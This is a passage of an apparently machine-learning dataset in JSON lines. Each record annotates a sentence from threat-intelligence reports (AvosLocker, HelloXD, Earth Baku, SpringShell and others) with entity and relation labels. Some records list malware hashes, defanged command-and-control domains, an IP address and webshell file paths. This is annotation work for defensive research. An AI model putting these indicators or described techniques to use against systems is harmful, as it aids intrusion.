Driver).","entities":[{"id":5382,"label":"tools","start_offset":23,"end_offset":31},{"id":5383,"label":"tools","start_offset":53,"end_offset":63},{"id":46962,"label":"SOFTWARE","start_offset":144,"end_offset":169},{"id":46963,"label":"FILEPATH","start_offset":117,"end_offset":129},{"id":46964,"label":"attack-pattern","start_offset":71,"end_offset":102}],"relations":[{"id":278,"from_id":46962,"to_id":46963,"type":"consists-of"}],"Comments":[]} {"id":1850,"text":"After disabling the security products, the actors behind AvosLocker again tried to transfer other tools, namely Mimikatz and Impacket.","entities":[{"id":46979,"label":"tools","start_offset":112,"end_offset":120},{"id":46978,"label":"malware","start_offset":57,"end_offset":67},{"id":46980,"label":"tools","start_offset":125,"end_offset":133}],"relations":[{"id":280,"from_id":46978,"to_id":46979,"type":"downloads"},{"id":281,"from_id":46978,"to_id":46980,"type":"downloads"}],"Comments":[]} {"id":1852,"text":" We also observed the execution of a password recovery tool XenArmor with C:\\temp\\pass\\start.exe.","entities":[{"id":46982,"label":"tools","start_offset":63,"end_offset":71},{"id":46981,"label":"FILEPATH","start_offset":77,"end_offset":99}],"relations":[{"id":282,"from_id":46982,"to_id":46981,"type":"consists-of"}],"Comments":[]} {"id":1858,"text":" Deploying across the network We saw software deployment tool PDQ being used to deploy malicious batch scripts to multiple endpoints in the network.","entities":[{"id":46986,"label":"attack-pattern","start_offset":83,"end_offset":113},{"id":46985,"label":"tools","start_offset":65,"end_offset":68}],"relations":[{"id":283,"from_id":46986,"to_id":46985,"type":"uses"}],"Comments":[]} {"id":1860,"text":"While AvosLocker has been documented for its abuse of AnyDesk for lateral movement as its preferred application, we note that other remote access applications can also be abused to replace it.","entities":[{"id":45154,"label":"malware","start_offset":6,"end_offset":16},{"id":45155,"label":"tools","start_offset":54,"end_offset":61},{"id":45156,"label":"attack-pattern","start_offset":66,"end_offset":82}],"relations":[{"id":77,"from_id":45154,"to_id":45155,"type":"uses"},{"id":284,"from_id":45156,"to_id":45155,"type":"uses"},{"id":285,"from_id":45154,"to_id":45156,"type":"uses"}],"Comments":[]} {"id":1872,"text":"Avast responded to our notification with this statement: \"We can confirm the vulnerability in an old version of our driver aswArPot.sys, which we fixed in our Avast 21.5 released in June 2021.","entities":[{"id":45157,"label":"FILEPATH","start_offset":123,"end_offset":135},{"id":45158,"label":"SOFTWARE","start_offset":159,"end_offset":169},{"id":45159,"label":"TIME","start_offset":182,"end_offset":191},{"id":45160,"label":"identity","start_offset":0,"end_offset":5}],"relations":[{"id":286,"from_id":45158,"to_id":45157,"type":"consists-of"}],"Comments":[]} {"id":1882,"text":"AvosLocker executable 05ba2df0033e3cd5b987d66b6de545df439d338a20165c0ba96cde8a74e463e5 Ransom.Win32.AVOSLOCKER.SMYXBLNT Mimikatz executable (x32 and x64) 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 HackTool.Win64.MIMIKATZ.ZTJA e81a8f8ad804c4d83869d7806a303ff04f31cce376c5df8aada2e9db2c1eeb98 HackTool.Win32.Mimikatz.CNFW Log4shell Nmap NSE script ddcb0e99f27e79d3536a15e0d51f7f33c38b2ae48677570f36f5e92863db5a96 Backdoor.Win32.CVE202144228.YACAH Impacket tool 14f0c4ce32821a7d25ea5e016ea26067d6615e3336c3baa854ea37a290a462a8 HackTool.Win32.Impacket.AA","entities":[{"id":5525,"label":"tools","start_offset":120,"end_offset":128},{"id":5529,"label":"tools","start_offset":352,"end_offset":356},{"id":5523,"label":"SHA2","start_offset":22,"end_offset":86},{"id":5530,"label":"SHA2","start_offset":368,"end_offset":432},{"id":5522,"label":"malware","start_offset":0,"end_offset":10},{"id":5527,"label":"SHA2","start_offset":154,"end_offset":218},{"id":5528,"label":"SHA2","start_offset":248,"end_offset":312},{"id":5533,"label":"SHA2","start_offset":481,"end_offset":545},{"id":5531,"label":"tools","start_offset":467,"end_offset":475},{"id":47007,"label":"tools","start_offset":546,"end_offset":572},{"id":47009,"label":"tools","start_offset":219,"end_offset":247},{"id":47011,"label":"vulnerability","start_offset":342,"end_offset":351},{"id":47012,"label":"malware","start_offset":87,"end_offset":119},{"id":47008,"label":"tools","start_offset":313,"end_offset":341},{"id":47010,"label":"tools","start_offset":433,"end_offset":466}],"relations":[{"id":288,"from_id":47012,"to_id":5522,"type":"duplicate-of"},{"id":287,"from_id":5522,"to_id":5523,"type":"consists-of"}],"Comments":[]} {"id":1887,"text":"What sets Urpage attacks apart is its targeting of InPage, a word processor for Urdu and Arabic languages.","entities":[{"id":45163,"label":"SOFTWARE","start_offset":51,"end_offset":57},{"id":45162,"label":"threat-actor","start_offset":10,"end_offset":16}],"relations":[{"id":78,"from_id":45162,"to_id":45163,"type":"targets"}],"Comments":[]} {"id":1893,"text":"The link between Bahamut and Urpage can be best discussed by way of the multiple malicious Android samples that matched Bahamut's code and had C&C belonging to the Urpage infrastructure.","entities":[{"id":45170,"label":"Infrastucture","start_offset":143,"end_offset":146},{"id":45167,"label":"threat-actor","start_offset":120,"end_offset":128},{"id":5570,"label":"threat-actor","start_offset":17,"end_offset":24},{"id":5572,"label":"threat-actor","start_offset":29,"end_offset":35},{"id":5578,"label":"threat-actor","start_offset":164,"end_offset":170},{"id":47025,"label":"SOFTWARE","start_offset":91,"end_offset":106}],"relations":[{"id":289,"from_id":5570,"to_id":5572,"type":"related-to"}],"Comments":[]} {"id":1903,"text":"As with Bahamut applications, once downloaded and executed, it showed multiple malicious features that deal with stealing information.","entities":[{"id":47030,"label":"attack-pattern","start_offset":113,"end_offset":133},{"id":47029,"label":"threat-actor","start_offset":8,"end_offset":15}],"relations":[{"id":290,"from_id":47029,"to_id":47030,"type":"uses"}],"Comments":[]} {"id":1921,"text":" A malicious RTF file that exploits the CVE-2017-8750 and drops a malicious VB backdoor with C&C appswonder[.]info A malicious InPage file that exploits CVE-2017-12824 and drops two files, one non-malicious, and one malicious VB backdoor with C&C referfile[.]com Talos recently reported both C&C domain names with one type of campaign that targets iOS and involves MDM, and another type using VB and Delphi backdoors.","entities":[{"id":47039,"label":"vulnerability","start_offset":40,"end_offset":53},{"id":47042,"label":"DOMAIN","start_offset":247,"end_offset":262},{"id":47043,"label":"identity","start_offset":264,"end_offset":269},{"id":47044,"label":"SOFTWARE","start_offset":349,"end_offset":352},{"id":47045,"label":"malware","start_offset":3,"end_offset":16},{"id":47040,"label":"vulnerability","start_offset":153,"end_offset":167},{"id":47041,"label":"DOMAIN","start_offset":97,"end_offset":114}],"relations":[{"id":291,"from_id":47045,"to_id":47039,"type":"exploits"},{"id":292,"from_id":47045,"to_id":47041,"type":"communicates-with"}],"Comments":[]} {"id":1927,"text":"One of the RTF files was found in a server related to Confucius (f1a54dca2fdfe59ec3f537148460364fb5d046c9b4e7db5fc819a9732ae0e063, detected as TROJ_CVE201711882.AG), while the other one (434d34c0502910c562f5c6840694737a2c82a8c44004fa58c7c457b08aac17bd,detected as Mal_CVE20170199-2) downloaded a VB Backdoor that pings back to twitck[.]com, a domain name belonging to Urpage.","entities":[{"id":5662,"label":"SHA2","start_offset":187,"end_offset":251},{"id":5659,"label":"threat-actor","start_offset":54,"end_offset":63},{"id":5660,"label":"SHA2","start_offset":65,"end_offset":129},{"id":47051,"label":"malware","start_offset":143,"end_offset":163},{"id":47052,"label":"malware","start_offset":264,"end_offset":281},{"id":47053,"label":"DOMAIN","start_offset":327,"end_offset":339},{"id":47054,"label":"threat-actor","start_offset":368,"end_offset":374}],"relations":[{"id":293,"from_id":5660,"to_id":5659,"type":"authored-by"},{"id":294,"from_id":47051,"to_id":5660,"type":"related-to"},{"id":295,"from_id":47051,"to_id":5659,"type":"authored-by"},{"id":296,"from_id":5662,"to_id":5659,"type":"authored-by"},{"id":297,"from_id":47052,"to_id":5659,"type":"authored-by"},{"id":298,"from_id":47052,"to_id":47053,"type":"beacons-to"},{"id":299,"from_id":47054,"to_id":47053,"type":"controls"}],"Comments":[]} {"id":1929,"text":"But this link is further fortified by the Android applications we found whose code is like that of Bahamut, with the C&C matching the usual name registration pattern of Patchwork’s group, as well as an infrastructure close to an old Patchwork domain.","entities":[{"id":45181,"label":"SOFTWARE","start_offset":42,"end_offset":49},{"id":45183,"label":"threat-actor","start_offset":169,"end_offset":178},{"id":45184,"label":"threat-actor","start_offset":233,"end_offset":242},{"id":45182,"label":"malware","start_offset":99,"end_offset":106}],"relations":[{"id":80,"from_id":45182,"to_id":45183,"type":"attributed-to"}],"Comments":[]} {"id":1942,"text":"The decoy documents tell more about Urpage's possible targets, as it contains text from articles about the region of Kashmir.","entities":[{"id":47066,"label":"threat-actor","start_offset":36,"end_offset":42},{"id":47067,"label":"location","start_offset":117,"end_offset":124}],"relations":[{"id":300,"from_id":47066,"to_id":47067,"type":"targets"}],"Comments":[]} {"id":1986,"text":"This post is also available in: 日本語 (Japanese) HelloXD is a ransomware family performing double extortion attacks that surfaced in November 2021.","entities":[{"id":45202,"label":"malware","start_offset":53,"end_offset":60},{"id":45203,"label":"TIME","start_offset":137,"end_offset":150},{"id":45205,"label":"attack-pattern","start_offset":95,"end_offset":111}],"relations":[{"id":81,"from_id":45202,"to_id":45205,"type":"uses"}],"Comments":[]} {"id":1992,"text":" During the analysis of the MicroBackdoor sample, Unit 42 observed the configuration and found an embedded IP address, belonging to a threat actor we believe is potentially the developer: x4k, also known as L4ckyguy, unKn0wn, unk0w, _unkn0wn and x4kme.","entities":[{"id":45216,"label":"threat-actor","start_offset":246,"end_offset":251},{"id":45209,"label":"malware","start_offset":28,"end_offset":41},{"id":45212,"label":"threat-actor","start_offset":207,"end_offset":215},{"id":45210,"label":"identity","start_offset":50,"end_offset":57},{"id":45213,"label":"threat-actor","start_offset":217,"end_offset":224},{"id":45211,"label":"threat-actor","start_offset":188,"end_offset":191},{"id":45214,"label":"threat-actor","start_offset":226,"end_offset":231},{"id":45215,"label":"threat-actor","start_offset":233,"end_offset":241}],"relations":[{"id":87,"from_id":45216,"to_id":45211,"type":"duplicate-of"},{"id":83,"from_id":45212,"to_id":45211,"type":"duplicate-of"},{"id":84,"from_id":45213,"to_id":45211,"type":"duplicate-of"},{"id":85,"from_id":45214,"to_id":45211,"type":"duplicate-of"},{"id":86,"from_id":45215,"to_id":45211,"type":"duplicate-of"},{"id":88,"from_id":45209,"to_id":45211,"type":"authored-by"}],"Comments":[]} {"id":2002,"text":" The file description included the entry VlahmAV, a play on words on ClamAV, and the developer named the ransomware HelloXD and used another potential alias, uKnow, as the developer of HelloXD in the copyright section.","entities":[{"id":47109,"label":"SOFTWARE","start_offset":69,"end_offset":75},{"id":47111,"label":"malware","start_offset":116,"end_offset":123},{"id":47112,"label":"malware","start_offset":158,"end_offset":163},{"id":47110,"label":"malware","start_offset":185,"end_offset":192}],"relations":[{"id":302,"from_id":47110,"to_id":47112,"type":"duplicate-of"},{"id":301,"from_id":47111,"to_id":47112,"type":"duplicate-of"}],"Comments":[]} {"id":2013,"text":"For example, LockBit 2.0 leverages Tox Chat for threat actor communications.","entities":[{"id":45221,"label":"malware","start_offset":13,"end_offset":24},{"id":45222,"label":"tools","start_offset":35,"end_offset":43}],"relations":[{"id":89,"from_id":45221,"to_id":45222,"type":"uses"}],"Comments":[]} {"id":2027,"text":"While the obfuscation and execution may differ between the two, both samples contain very similar core functionality, due to the author copying the leaked Babuk\/Babyk source code in order to develop the HelloXD ransomware (Figure 7).","entities":[{"id":47122,"label":"malware","start_offset":203,"end_offset":210},{"id":47121,"label":"malware","start_offset":161,"end_offset":166},{"id":47120,"label":"malware","start_offset":155,"end_offset":160}],"relations":[{"id":303,"from_id":47121,"to_id":47122,"type":"variant-of"},{"id":304,"from_id":47120,"to_id":47122,"type":"variant-of"}],"Comments":[]} {"id":2030,"text":" While there is a lot of overlap between HelloXD and Babuk, there are some small but crucial differences to take note of between Babuk and the two different variants. HelloXD version 1 is the least modified, utilizing Curve25519-Donna and a modified HC-128 algorithm to encrypt file data, while also containing the same CRC hashing routine incorporating the string dong, possibly referencing Chuong Dong, who had previously analyzed and reported on the first version of Babuk (Figure 8).","entities":[{"id":47125,"label":"malware","start_offset":53,"end_offset":58},{"id":47127,"label":"malware","start_offset":168,"end_offset":175},{"id":47128,"label":"malware","start_offset":471,"end_offset":476},{"id":47129,"label":"identity","start_offset":393,"end_offset":404},{"id":47124,"label":"malware","start_offset":41,"end_offset":48},{"id":47126,"label":"malware","start_offset":129,"end_offset":134}],"relations":[{"id":305,"from_id":47124,"to_id":47125,"type":"variant-of"}],"Comments":[]} {"id":2058,"text":"From the GitHub page, we also observed a URL to a site – xn--90a5ai[.]com(фсб[.]com) – resolving to the previously mentioned IP 164[.]68[.]114[.]29, which at this point in time only shows an animation of interconnecting points.","entities":[{"id":45239,"label":"DOMAIN","start_offset":74,"end_offset":83},{"id":45240,"label":"IPV4","start_offset":128,"end_offset":147},{"id":45237,"label":"SOFTWARE","start_offset":9,"end_offset":15},{"id":45238,"label":"DOMAIN","start_offset":57,"end_offset":73}],"relations":[{"id":306,"from_id":45238,"to_id":45240,"type":"related-to"},{"id":307,"from_id":45239,"to_id":45240,"type":"related-to"}],"Comments":[]} {"id":2059,"text":"That being said, when looking at the HTML source code of the site, we discovered a couple of references to the user observed before – x4kme – and other aliases such as uKn0wn, which was observed in the HelloXD ransomware samples.","entities":[{"id":47152,"label":"identity","start_offset":168,"end_offset":174},{"id":47150,"label":"identity","start_offset":134,"end_offset":139},{"id":47151,"label":"malware","start_offset":202,"end_offset":209}],"relations":[{"id":308,"from_id":47150,"to_id":47152,"type":"duplicate-of"}],"Comments":[]} {"id":2061,"text":", we were able to observe another GitHub account with the name l4ckyguy, sharing the profile picture, location and URL in the description, with a link to the previously observed account (x4kme), and a name, Ivan Topor, which we believe may be another alias for this threat actor.","entities":[{"id":45241,"label":"SOFTWARE","start_offset":34,"end_offset":40},{"id":45242,"label":"identity","start_offset":63,"end_offset":71},{"id":45243,"label":"threat-actor","start_offset":187,"end_offset":192},{"id":45244,"label":"identity","start_offset":207,"end_offset":218},{"id":6137,"label":"location","start_offset":111,"end_offset":114},{"id":6138,"label":"location","start_offset":195,"end_offset":198},{"id":6140,"label":"location","start_offset":236,"end_offset":239}],"relations":[{"id":93,"from_id":45243,"to_id":45244,"type":"related-to"},{"id":92,"from_id":45243,"to_id":45242,"type":"related-to"}],"Comments":[]} {"id":2064,"text":"This particular IP was linked to a Contabo server that x4k had also included within their VirusTotal graph discussed above.","entities":[{"id":45245,"label":"threat-actor","start_offset":55,"end_offset":58},{"id":45247,"label":"identity","start_offset":35,"end_offset":42},{"id":45246,"label":"SOFTWARE","start_offset":90,"end_offset":101}],"relations":[{"id":94,"from_id":45245,"to_id":45247,"type":"uses"}],"Comments":[]} {"id":2081,"text":"Most of his videos, comments, configurations and tutorials are written in Russian – and when combined with knowledge gained from a few OPSEC mistakes – Russia is also where we believe x4k originates from.","entities":[{"id":47209,"label":"threat-actor","start_offset":184,"end_offset":187},{"id":47210,"label":"location","start_offset":152,"end_offset":158}],"relations":[{"id":310,"from_id":47209,"to_id":47210,"type":"located-at"}],"Comments":[]} {"id":2103,"text":"This post is also available in: 日本語 (Japanese) A recent vulnerability in the Kerberos authentication protocol, CVE-2020-17049 (dubbed Bronze Bit), has been disclosed by Microsoft.","entities":[{"id":45392,"label":"identity","start_offset":175,"end_offset":184},{"id":45390,"label":"vulnerability","start_offset":117,"end_offset":131},{"id":45393,"label":"SOFTWARE","start_offset":83,"end_offset":91},{"id":45391,"label":"vulnerability","start_offset":140,"end_offset":150}],"relations":[{"id":95,"from_id":45391,"to_id":45390,"type":"duplicate-of"}],"Comments":[]} {"id":2114,"text":"On August 22, 2018, the Apache Foundation released a critical security update for CVE-2018-1176, a remote code execution vulnerability affecting Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16.","entities":[{"id":47248,"label":"TIME","start_offset":3,"end_offset":18},{"id":47249,"label":"vulnerability","start_offset":82,"end_offset":95},{"id":47252,"label":"SOFTWARE","start_offset":145,"end_offset":199},{"id":47250,"label":"vulnerability","start_offset":99,"end_offset":134}],"relations":[{"id":311,"from_id":47252,"to_id":47249,"type":"has"},{"id":312,"from_id":47252,"to_id":47250,"type":"has"}],"Comments":[]} {"id":2185,"text":"This new campaign used updated instances of the Tdrop malware family discovered in the Operation Troy campaign.","entities":[{"id":6580,"label":"malware","start_offset":48,"end_offset":53},{"id":47314,"label":"campaign","start_offset":87,"end_offset":110}],"relations":[{"id":313,"from_id":47314,"to_id":6580,"type":"delivers"}],"Comments":[]} {"id":2285,"text":"Parallel to the analysis, tracking, and technical disruption of this botnet, Google has filed a lawsuit against two individuals believed to be located in Russia for operating the Glupteba Botnet and its various criminal schemes.","entities":[{"id":47357,"label":"identity","start_offset":77,"end_offset":83},{"id":47356,"label":"malware","start_offset":179,"end_offset":187},{"id":47358,"label":"location","start_offset":154,"end_offset":160}],"relations":[{"id":314,"from_id":47356,"to_id":47358,"type":"located-at"}],"Comments":[]} {"id":2298,"text":"In late August 2021, TAG discovered watering hole attacks targeting visitors to Hong Kong websites for a media outlet and a prominent pro-democracy labor and political group.","entities":[{"id":45449,"label":"TIME","start_offset":8,"end_offset":19},{"id":45451,"label":"attack-pattern","start_offset":36,"end_offset":49},{"id":45453,"label":"identity","start_offset":134,"end_offset":173},{"id":45452,"label":"location","start_offset":80,"end_offset":90},{"id":45450,"label":"identity","start_offset":21,"end_offset":24}],"relations":[{"id":97,"from_id":45453,"to_id":45451,"type":"targets"},{"id":96,"from_id":45451,"to_id":45452,"type":"targets"}],"Comments":[]} {"id":2299,"text":"The watering hole served an XNU privilege escalation vulnerability (CVE-2021-30869) unpatched in macOS Catalina, which led to the installation of a previously unreported backdoor.","entities":[{"id":47364,"label":"vulnerability","start_offset":68,"end_offset":82},{"id":47365,"label":"SOFTWARE","start_offset":97,"end_offset":111},{"id":47366,"label":"vulnerability","start_offset":28,"end_offset":66}],"relations":[{"id":315,"from_id":47365,"to_id":47364,"type":"has"}],"Comments":[]} {"id":2313,"text":"The exploit chain combined an RCE in WebKit exploiting CVE-2021-1789 which was patched on Jan 5, 2021 before discovery of this campaign and a 0-day local privilege escalation in XNU (CVE-2021-30869) patched on Sept 23, 2021.","entities":[{"id":45456,"label":"vulnerability","start_offset":55,"end_offset":68},{"id":45462,"label":"SOFTWARE","start_offset":178,"end_offset":181},{"id":45460,"label":"TIME","start_offset":210,"end_offset":223},{"id":45461,"label":"attack-pattern","start_offset":148,"end_offset":174},{"id":45457,"label":"SOFTWARE","start_offset":37,"end_offset":43},{"id":45458,"label":"TIME","start_offset":90,"end_offset":101},{"id":45459,"label":"vulnerability","start_offset":183,"end_offset":197}],"relations":[{"id":98,"from_id":45456,"to_id":45457,"type":"has"},{"id":99,"from_id":45459,"to_id":45462,"type":"has"}],"Comments":[]} {"id":2354,"text":"Beer was able to quickly recognize this exploit as a variant of an earlier port type confusion vulnerability he analyzed in the XNU kernel (CVE-2020-27932).","entities":[{"id":47411,"label":"SOFTWARE","start_offset":128,"end_offset":138},{"id":47412,"label":"vulnerability","start_offset":140,"end_offset":154}],"relations":[{"id":318,"from_id":47412,"to_id":47411,"type":"has"}],"Comments":[]} {"id":2365,"text":"For those interested in following our in-the-wild work, we will soon publish details surrounding another, unrelated campaign we discovered using two Chrome 0-days (CVE-2021-37973 and CVE-2021-37976).","entities":[{"id":47418,"label":"vulnerability","start_offset":183,"end_offset":197},{"id":47419,"label":"SOFTWARE","start_offset":149,"end_offset":155},{"id":47417,"label":"vulnerability","start_offset":164,"end_offset":178}],"relations":[{"id":319,"from_id":47419,"to_id":47417,"type":"has"},{"id":320,"from_id":47419,"to_id":47418,"type":"has"}],"Comments":[]} {"id":2368,"text":"We have uncovered a cyberespionage campaign being perpetrated by Earth Baku, an advanced persistent threat (APT) group with a known history of carrying out cyberattacks under the alias APT41.","entities":[{"id":47423,"label":"threat-actor","start_offset":185,"end_offset":190},{"id":47424,"label":"threat-actor","start_offset":65,"end_offset":75}],"relations":[{"id":321,"from_id":47424,"to_id":47423,"type":"duplicate-of"}],"Comments":[]} {"id":2370,"text":"Earth Baku deploys its ongoing campaign, which can be traced to as far back as July 2020, through multiple attack vectors that are designed based on different exploits or the infrastructure of its targeted victim's environment: • SQL injection to upload a malicious file • Installment through InstallUtil.exe in a scheduled task • Possibly a malicious link (LNK) file sent as an email attachment • Exploitation of the ProxyLogon vulnerability CVE-2021-26855 to upload a China Chopper web shell This campaign uses previously unidentified shellcode loaders, which we have named StealthVector and StealthMutant, and a backdoor, which we have dubbed ScrambleCross.","entities":[{"id":45480,"label":"threat-actor","start_offset":0,"end_offset":10},{"id":45472,"label":"vulnerability","start_offset":444,"end_offset":458},{"id":45474,"label":"malware","start_offset":578,"end_offset":591},{"id":45475,"label":"malware","start_offset":596,"end_offset":609},{"id":45476,"label":"malware","start_offset":648,"end_offset":661},{"id":45477,"label":"TIME","start_offset":79,"end_offset":88},{"id":45478,"label":"FILEPATH","start_offset":294,"end_offset":309},{"id":45479,"label":"vulnerability","start_offset":419,"end_offset":429},{"id":7033,"label":"attack-pattern","start_offset":231,"end_offset":244},{"id":7034,"label":"attack-pattern","start_offset":315,"end_offset":329},{"id":7036,"label":"malware","start_offset":471,"end_offset":484}],"relations":[{"id":100,"from_id":45479,"to_id":45472,"type":"duplicate-of"},{"id":323,"from_id":45480,"to_id":7033,"type":"uses"},{"id":324,"from_id":45480,"to_id":7034,"type":"uses"}],"Comments":[]} {"id":2381,"text":"After its payload is decrypted, StealthMutant performs process hollowing to execute its payload in a remote process.","entities":[{"id":7081,"label":"attack-pattern","start_offset":55,"end_offset":72},{"id":47444,"label":"malware","start_offset":32,"end_offset":45}],"relations":[{"id":325,"from_id":47444,"to_id":7081,"type":"uses"}],"Comments":[]} {"id":2383,"text":"Both StealthMutant and StealthVector contain a payload of either the Cobalt Strike beacon or ScrambleCross, a newly discovered backdoor.","entities":[{"id":47445,"label":"malware","start_offset":5,"end_offset":18},{"id":47448,"label":"malware","start_offset":93,"end_offset":106},{"id":47446,"label":"malware","start_offset":23,"end_offset":36},{"id":47447,"label":"tools","start_offset":69,"end_offset":82}],"relations":[{"id":326,"from_id":47446,"to_id":47447,"type":"uses"},{"id":327,"from_id":47446,"to_id":47448,"type":"uses"},{"id":328,"from_id":47445,"to_id":47447,"type":"uses"},{"id":329,"from_id":47445,"to_id":47448,"type":"uses"}],"Comments":[]} {"id":2386,"text":"It has many of the same capabilities as another backdoor, Crosswalk, which has also been used by Earth Baku.","entities":[{"id":47451,"label":"threat-actor","start_offset":97,"end_offset":107},{"id":47450,"label":"malware","start_offset":58,"end_offset":67}],"relations":[{"id":330,"from_id":47451,"to_id":47450,"type":"uses"}],"Comments":[]} {"id":2391,"text":"But because Earth Baku has updated its toolset with StealthVector, StealthMutant, and ScrambleCross for this new campaign, we have identified it as its own separate operation.","entities":[{"id":45488,"label":"threat-actor","start_offset":12,"end_offset":22},{"id":45490,"label":"malware","start_offset":52,"end_offset":65},{"id":45491,"label":"malware","start_offset":67,"end_offset":80},{"id":45492,"label":"malware","start_offset":86,"end_offset":99}],"relations":[{"id":102,"from_id":45488,"to_id":45491,"type":"uses"},{"id":103,"from_id":45488,"to_id":45492,"type":"uses"},{"id":101,"from_id":45488,"to_id":45490,"type":"uses"}],"Comments":[]} {"id":2393,"text":"A timeline of Earth Baku’s previous campaign as APT41 and its new campaign How Earth Baku creates its malware tools Earth Baku is known for its use of self-developed tools.","entities":[{"id":47459,"label":"threat-actor","start_offset":14,"end_offset":24},{"id":47460,"label":"threat-actor","start_offset":48,"end_offset":53},{"id":47461,"label":"threat-actor","start_offset":79,"end_offset":89},{"id":47462,"label":"threat-actor","start_offset":116,"end_offset":126}],"relations":[{"id":331,"from_id":47459,"to_id":47460,"type":"duplicate-of"}],"Comments":[]} {"id":2398,"text":"On March 29, 2022, the Spring Cloud Expression Resource Access Vulnerability tracked in CVE-2022-22963 was patched with the release of Spring Cloud Function 3.1.7 and 3.2.3.","entities":[{"id":47468,"label":"TIME","start_offset":3,"end_offset":17},{"id":47470,"label":"vulnerability","start_offset":88,"end_offset":102},{"id":47469,"label":"vulnerability","start_offset":23,"end_offset":76},{"id":47471,"label":"SOFTWARE","start_offset":135,"end_offset":172}],"relations":[{"id":332,"from_id":47471,"to_id":47470,"type":"has"}],"Comments":[]} {"id":2399,"text":"Two days later on March 31, 2022, Spring released version 5.3.18 and 5.2.20 of Spring Framework to patch another more severe vulnerability tracked in CVE-2022-22965.","entities":[{"id":47472,"label":"TIME","start_offset":18,"end_offset":32},{"id":47473,"label":"SOFTWARE","start_offset":34,"end_offset":40},{"id":47474,"label":"SOFTWARE","start_offset":79,"end_offset":95},{"id":47475,"label":"vulnerability","start_offset":150,"end_offset":164}],"relations":[{"id":333,"from_id":47474,"to_id":47475,"type":"has"}],"Comments":[]} {"id":2400,"text":"The CVE-2022-22965 vulnerability allows an attacker unauthenticated remote code execution (RCE), which Unit 42 has observed being exploited in the wild.","entities":[{"id":45495,"label":"vulnerability","start_offset":4,"end_offset":18},{"id":45496,"label":"attack-pattern","start_offset":52,"end_offset":89},{"id":45497,"label":"identity","start_offset":103,"end_offset":110}],"relations":[{"id":105,"from_id":45496,"to_id":45495,"type":"delivers"}],"Comments":[]} {"id":2404,"text":" On April 8, we updated this blog to include statistics on SpringShell exploitation attempts that we identified by analyzing hits on the Spring Core Remote Code Execution Vulnerability threat prevention signature for the Palo Alto Networks Next-Generation Firewall, as well as alerts triggered in Cortex XDR.","entities":[{"id":47484,"label":"SOFTWARE","start_offset":297,"end_offset":307},{"id":47480,"label":"TIME","start_offset":4,"end_offset":11},{"id":47481,"label":"vulnerability","start_offset":59,"end_offset":70},{"id":47482,"label":"vulnerability","start_offset":137,"end_offset":184},{"id":47483,"label":"SOFTWARE","start_offset":221,"end_offset":264}],"relations":[{"id":334,"from_id":47481,"to_id":47482,"type":"related-to"}],"Comments":[]} {"id":2407,"text":"Affected Software and Versions Background on the Spring Framework Root Cause Analysis for CVE-2022-22965","entities":[{"id":47486,"label":"vulnerability","start_offset":90,"end_offset":104},{"id":47485,"label":"SOFTWARE","start_offset":49,"end_offset":65}],"relations":[{"id":335,"from_id":47485,"to_id":47486,"type":"has"}],"Comments":[]} {"id":2427,"text":"Early in 2010, CVE-2010-1622 was assigned to a remote code execution vulnerability in the Spring Framework.","entities":[{"id":45513,"label":"vulnerability","start_offset":15,"end_offset":28},{"id":45514,"label":"SOFTWARE","start_offset":90,"end_offset":106},{"id":45515,"label":"attack-pattern","start_offset":47,"end_offset":68},{"id":45512,"label":"TIME","start_offset":0,"end_offset":13}],"relations":[{"id":106,"from_id":45514,"to_id":45513,"type":"has"},{"id":107,"from_id":45515,"to_id":45513,"type":"uses"}],"Comments":[]} {"id":2476,"text":"This particular webshell is based on AntSword’s shell.jsp, which was modified to use a parameter of k3rwin instead of ant to load the class.","entities":[{"id":7400,"label":"tools","start_offset":37,"end_offset":45},{"id":47549,"label":"identity","start_offset":100,"end_offset":106},{"id":47548,"label":"FILEPATH","start_offset":48,"end_offset":57}],"relations":[{"id":336,"from_id":7400,"to_id":47548,"type":"consists-of"}],"Comments":[]} {"id":2488,"text":"The signature triggered on the creation of the webshell files, of which we observed the following file written: \/usr\/local\/tomcat\/work\/Catalina\/localhost\/ROOT\/org\/apache\/jsp\/shell_jsp.java \/usr\/local\/tomcat\/webapps\/ROOT\/shell_.jsp SpringShell is officially assigned CVE-2022-22965, and the patch was released on March 31, 2022.","entities":[{"id":47567,"label":"FILEPATH","start_offset":190,"end_offset":231},{"id":47568,"label":"vulnerability","start_offset":268,"end_offset":282},{"id":47570,"label":"vulnerability","start_offset":233,"end_offset":244},{"id":47566,"label":"FILEPATH","start_offset":113,"end_offset":189},{"id":47569,"label":"TIME","start_offset":314,"end_offset":328},{"id":47571,"label":"attack-pattern","start_offset":47,"end_offset":55}],"relations":[{"id":337,"from_id":47570,"to_id":47568,"type":"related-to"},{"id":339,"from_id":47570,"to_id":47567,"type":"consists-of"},{"id":340,"from_id":47570,"to_id":47566,"type":"consists-of"}],"Comments":[]} {"id":2491,"text":" While CVE-2022-22963 is a different vulnerability in Spring Cloud Function (not technically part of SpringShell), a Threat Prevention signature is also available to ensure coverage at the perimeter.","entities":[{"id":47575,"label":"vulnerability","start_offset":101,"end_offset":112},{"id":47573,"label":"vulnerability","start_offset":7,"end_offset":21},{"id":47574,"label":"SOFTWARE","start_offset":54,"end_offset":66}],"relations":[{"id":341,"from_id":47574,"to_id":47573,"type":"has"}],"Comments":[]} {"id":2496,"text":"Palo Alto Networks Cortex XDR Prevent and Pro customers running agent version 7.4 and above with content version 450-87751 on Linux devices are protected from CVE-2022-22963 using the Java Deserialization module; customers running agent version 7.7 and content 480 and above are protected from CVE-2022-22963 and CVE-2022-22965 for both Windows and Linux using the Java Deserialization module; other OSes and exploits receive protections from post-exploitation activities using Behavioral Threat Protection, Password Theft Prevention, Anti Ransomware and other Anti Exploitation modules.","entities":[{"id":47587,"label":"vulnerability","start_offset":159,"end_offset":173},{"id":47585,"label":"SOFTWARE","start_offset":0,"end_offset":45},{"id":47588,"label":"SOFTWARE","start_offset":184,"end_offset":211},{"id":47590,"label":"vulnerability","start_offset":313,"end_offset":327},{"id":47591,"label":"SOFTWARE","start_offset":337,"end_offset":344},{"id":47593,"label":"SOFTWARE","start_offset":365,"end_offset":392},{"id":47586,"label":"SOFTWARE","start_offset":126,"end_offset":131},{"id":47589,"label":"vulnerability","start_offset":294,"end_offset":308},{"id":47592,"label":"SOFTWARE","start_offset":349,"end_offset":354}],"relations":[{"id":342,"from_id":47587,"to_id":47588,"type":"related-to"}],"Comments":[]} {"id":2516,"text":" The FBI has connected Conti to more than 400 cyberattacks against organizations worldwide, three-quarters of which are based in the U.S., with demands 